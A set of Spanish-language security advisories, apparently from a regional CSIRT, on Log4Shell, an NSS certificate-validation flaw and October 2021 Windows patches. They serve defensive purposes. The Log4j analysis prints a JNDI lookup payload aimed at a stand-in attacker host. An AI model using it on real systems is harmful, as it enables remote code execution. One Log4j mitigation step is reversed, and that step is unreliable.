Publicado el

Actualidad sobre la vulnerabilidad en Java Apache Log4j 2 (CVE-2021-44228), también conocida como Log4Shell

Se envía la siguiente actualización para informar que se ha publicado un nuevo vector de ataque relacionado con denegación de servicio que no se corrige actualizando a la versión 2.15 tal y como indicamos en la anterior notificación. Para solventar todas las vulnerabilidades detectadas, se recomienda actualizar a la nueva versión liberada 2.16.

Alerta anterior actualizada:
El pasado viernes 10/12/2021, se publicó una vulnerabilidad que afecta a las versiones de Apache Log4 desde 2.0 hasta 2.14.1. Esta librería está presente en la casi totalidad de los desarrollos basados en Java, tanto comerciales como a medida.

Debido a la facilidad de explotación y amplio alcance de la librería, fue categorizada como CRÍTICA (CVSS 10), ya que una explotación exitosa permitiría la ejecución remota de código, comprometiendo por completo el equipo y su información.

En caso de detectar la explotación de esta vulnerabilidad puede o si necesita información adicional, puede contactarnos en csirtcv@gva.es

 

ACCIONES CORPORATIVAS REALIZADAS

    • Desde el viernes se están detectando numerosos intentos de explotación contra los sistemas corporativos, no teniendo constancia de que ninguno haya sido efectivo.
    • Desde el perímetro de la red se están monitorizando y analizando cada uno de estos intentos, gestionando con los responsables de los sistemas cada incidente particular.
    • Se están bloqueando automáticamente algunos intentos de explotación para el tráfico sin cifrar, previendo ampliarlo al tráfico cifrado en breve, tanto externa como internamente (actuaciones en curso).
    • Ya existía un filtrado de conexiones salientes para servidores que evita potencialmente la infección de los servidores.
    • Se están analizando los sistemas existentes en la red corporativa, tanto automáticamente como contra el inventario, para identificar sistemas vulnerables, y tomar las medidas particulares que procedan en cada caso.
    • Se han retirado las librerías vulnerables de los repositorios de desarrollo corporativos para congelar cualquier desarrollo en curso que utilice las librerías vulnerables.

 

ACCIONES A TOMAR POR LOS RESPONSABLES DE LOS SISTEMAS
IMPRESCINDIBLE: eliminar la vulnerabilidad

    • La vulnerabilidad se puede mitigar en la versión 2.10 y posteriores estableciendo la propiedad del sistema «log4j2.formatMsgNoLookups» en «true» o eliminando la clase JndiLookup del classpath.
    • Para versiones anteriores a 2.10.0, existen dos opciones:
      • Modificar el diseño de cada patrón de registro para cambiar %m{nolookups} por %m en los archivos de configuración de registro.
      • Sustituir una implementación vacía o no vulnerable de la clase apache.logging.log4j.core.lookup.JndiLookup, de manera que su cargador de clases use el reemplazo en lugar de la versión vulnerable de la clase.

Acciones compensatorias a nivel de red

    • Si no se utiliza la conexión a Internet corporativa o se dispone de cortafuegos o dispositivos con capacidad de bloqueo, se recomienda actualizar las firmas y activar las protecciones proporcionadas por el fabricante.
    • Para los servidores no administrados por el servicio de sistemas de la Generalitat, bloquear la salida a Internet, principalmente los que se encuentran en DMZ permitiendo solo listas blancas.
    • Revisar si se ha tenido un aumento de conexiones DNS desde el pasado fin de semana.
    • Escanear la red en busca de aplicaciones y servicios vulnerables. Las aplicaciones Nessus o Burp ya disponen de plugins específicos.

Acciones compensatorias a nivel de sistema operativo

    • Revisar localmente los servidores en busca de aplicaciones vulnerables siguiendo las indicaciones proporcionadas por el CCN-Cert para PowerShell, Linux, Go o búsquedas manuales:

https://www.ccn-cert.cni.es/seguridad-al-dia/alertas-ccn-cert/11435-ccn-cert-al-09-21-vulnerabilidad-en-apache-log4j-2.html

    • La herramienta Loki permite análisis locales con reglas YARA para comprobar si un servidor ya ha sido atacado utilizando esta vulnerabilidad: https://github.com/Neo23x0/Loki

 

+INFORMACIÓN

Publicado el

RCE en la librería log4j de Java

El día 9 de Diciembre, un exploit 0-day fue encontrado en la librería de Java «log4j» que permitía la ejecución de código remoto registrando una determinada cadena.

 

ANÁLISIS

CVE-2021-44228

La vulnerabilidad se dispara cuando los logs de un server contienen el siguiente payload $ {jndi:ldap://attacker.com/a} (donde attacker.com es un servidor controlado por el atacante). De esta forma, log4j realiza una petición al servidor mediante Java Naming and Directory Interface (JNDI) obteniendo como respuesta la ruta a un archivo de clase Java remoto. Este payload permitirá que un atacante ejecute código arbitrario [1].

Productos afectados:

2.0 <= Apache log4j <= 2.14.1

Actualmente la vulnerabilidad no tiene una puntuación CVSS v3 oficial. Sin embargo, debido a su gravedad, en muchas publicaciones ha sido considerada como crítica [2].
En la página de LunaSec [1] podemos encontrar un ejemplo de explotación de esta vulnerabilidad. Además, el proyecto marshalsec ofrece una herramienta para poder crear payloads, que podría ser utilizada en esta vulnerabilidad.

  •  

RECOMENDACIONES
Actualmente no existe una versión estable disponible. No obstante, hay dos parches candidatos publicados como log4j-2.15.0-rc1 y log4j-2.15.0-rc2 disponibles en el GitHub de Apache [3], los cuales se recomienda su instalación. Además, para versiones superiores a la 2.10.0 se añadió la propiedad «formatMsgNoLookups» cuya configuración a «true» puede mitigar la vulnerabilidad temporalmente [4].

 

REFERENCIAS
(1) https://www.lunasec.io/docs/blog/log4j-zero-day/
(2) https://logging.apache.org/log4j/2.x/security.html
(3) https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
(4) https://issues.apache.org/jira/browse/LOG4J2-2109

Publicado el

RCE en la validación de certificados del servicio NSS

Recientemente se encontró una vulnerabilidad RCE en la validación de certificados del servicio NSS.

NSS es un servicio que permite la resolución de nombres de usuario y claves mediante el acceso a diferentes bases de datos [1].

 

ANÁLISIS

NSS es vulnerable a un desbordamiento de pila cuando se manejan firmas DSA o RSA-PSS codificadas en la extensión .DER [2]. Esta vulnerabilidad permite a un atacante, haciéndose pasar por un servidor SSL / TLS, ejecutar código remoto en un cliente con NSS cuando se conecte por SSL / TLS. De manera inversa, un servidor con NSS que procesa certificados puede recibir uno malicioso a partir de un cliente. [3]

La vulnerabilidad no tiene una puntuación CVSS v3 oficial, pero diversas fuentes la puntúan en torno al 9 [2] [3], por lo que se puede considerar que reviste de cierta gravedad. NSS es una técnologia bastante extendida, el problema no se limita a TLS, todas las aplicaciones que utilizan la verificación de Certificados NSS codificados en CMS, S/MIME, PKCS #7 o PKCS # 12 (como Thunderbird, LibreOffice, Evolution ó Evince) o servidores NSS que procesen certificados son vulnerables. Es importante recalcar que esta vulnerabilidad no afecta a Mozilla Firefox debido a que usa mozilla::pkix para verificar los certificados.

  •  

RECOMENDACIONES
NSS ha resuelto esta vulnerabilidad en las actualizaciones NSS 3.68.1 y NSS 3.73 [4] por lo que es recomendable actualizar todas las aplicaciones que utilicen la tecnología NSS a estas versiones [2].

 

REFERENCIAS
(1) http://somebooks.es/12-2-que-es-nss/
(2) https://www.mozilla.org/en-US/security/advisories/mfsa2021-51/
(3) https://access.redhat.com/security/cve/CVE-2021-43527
(4) https://pkgs.org/download/nss-shlibsign

Publicado el

Nuevas vulnerabilidades críticas para Microsoft Windows

A día 12 de octubre de 2021, se publicaron una serie de parches para corregir 74 vulnerabilidades de Microsoft Windows; de éstas 3 son clasificadas como críticas, 70 como importantes y 1 como baja.

ANÁLISIS
Entre las vulnerabilidades publicadas hay 4 de día cero (0-day), que son CVE-2021-40449 (CVSS score: 7.8)(1), CVE-2021-41335 (CVSS score: 7.8)(2), CVE-2021-40469 (CVSS score: 7.2)(3) y CVE-2021-41338 (CVSS score: 5.5)(4).

De ellas, 3 vulnerabilidades son divulgadas públicamente, pero no explotadas activamente: CVE-2021-40469, CVE-2021-41335 y CVE-2021-41338; y 1 vulnerabilidad es explotada activamente: CVE-2021-40449. Ésta última es una vulnerabilidad de escalada de privilegios que puede ser explotada en conjunción con bugs RCE para tomar el control de sistemas vulnerables.

Las vulnerabilidades publicadas corresponden a los siguientes tipos:

    • Denegación de servicio.
    • Escalada de privilegios.
    • Divulgación de información.
    • Ejecución remota de código (RCE).
    • Omisión de función de seguridad.
    • Suplantación de identidad (spoofing).

La alerta emitida por Incibe se puede consultar en (5), para un listado de los servicios afectados.

RECOMENDACIONES
Se recomienda aplicar la actualización de seguridad correspondiente, las cuales se pueden encontrar en (6). Para las actualizaciones de las vulnerabilidades de día cero, consultar (7), (8), (9) y (10).

REFERENCIAS
(1) https://nvd.nist.gov/vuln/detail/CVE-2021-40449
(2) https://nvd.nist.gov/vuln/detail/CVE-2021-41335
(3) https://nvd.nist.gov/vuln/detail/CVE-2021-40469
(4) https://nvd.nist.gov/vuln/detail/CVE-2021-41338
(5)https://www.incibe-cert.es/alerta-temprana/avisos-seguridad/actualizaciones-seguridad-microsoft-octubre-2021
(6) https://msrc.microsoft.com/update-guide/releaseNote/2021-Oct
(7) https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40449
(8) https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40469
(9) https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41335
(10) https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41338